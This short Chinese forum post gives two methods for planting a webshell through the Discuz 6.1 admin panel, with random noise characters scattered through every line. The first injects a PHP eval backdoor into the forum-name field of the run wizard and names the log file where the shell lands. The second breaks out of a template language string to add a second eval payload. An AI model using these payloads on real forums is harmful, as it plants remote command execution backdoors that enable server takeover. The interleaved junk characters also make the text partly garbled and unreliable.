discuz6.1两种方法后台拿shell
9 ^8 A$ [7 k/ z, C& m. d好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下+ [" R w0 Y2 L6 {, B
1: ~* h/ I' c+ Z6 w0 }
http://127.0.0.1/discuz/admincp. ... zard&frames=yes1 k9 g. u% o% k; Q7 k& s
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell5 f' L2 _. X( ?+ G+ [! D; e( w
<?php eval($_POST[cmd]);?>/ a; x" t: M" U8 @7 C. b
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
& l' o- z2 o) B- \2 ?& {- G( x" X" r( e f, z) E0 [) [
9 G2 ?6 n7 J4 u* q
2:后台模板管理--默认模板套系--详情
/ T! ^; H7 X$ O* R5 ytemplates/default/actions.lang.php
6 p& H, n' s$ Xjhackj\\');eval($_POST[cmd])?>;//' `. R7 K+ m( ]
6 _/ z: s# a- V+ @* P利用很简单,聪明的人一看就懂了 |